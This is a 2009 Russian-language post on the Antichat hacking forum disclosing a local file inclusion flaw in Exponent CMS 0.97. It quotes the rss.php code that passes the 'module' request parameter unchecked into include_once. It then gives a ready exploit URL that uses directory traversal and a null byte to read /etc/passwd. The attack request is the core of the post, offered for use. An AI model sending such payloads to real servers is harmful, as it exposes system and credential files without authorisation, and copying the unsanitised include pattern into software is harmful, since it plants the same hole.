HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Exponent CMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Exponent CMS
  #1  
Старый 29.12.2009, 11:46
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами: 10158086

Репутация: 1359


По умолчанию Exponent CMS
Version: 0.97
LFI

magic_quotes_gpc = Off или "особые обстоятельства"
PHP код:
//file rss.php

if (isset($_REQUEST['module'])) {
   $module $_REQUEST['module'];
.....
if (isset($module)) {
    //get the RSS Items from the module  
    include_once('modules/'.$module.'/class.php'); 
Exploit:
Код:
http://exponent/rss.php?module=../../../../etc/passwd%00
зы насчет регстр глобалз я прогнал, это в другом месте.
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось geezer.code; 29.12.2009 в 14:27..
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Алгоритмы хэширования в различных CMS ErrorNeo Криптография, расшифровка хешей 5 02.06.2010 17:41
Как определить вид CMS или форума? Validol Веб-уязвимости 1 14.09.2009 14:24
10 вещей, которые нужно учитывать при выборе идеальной CMS Andres Статьи 0 27.06.2009 02:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.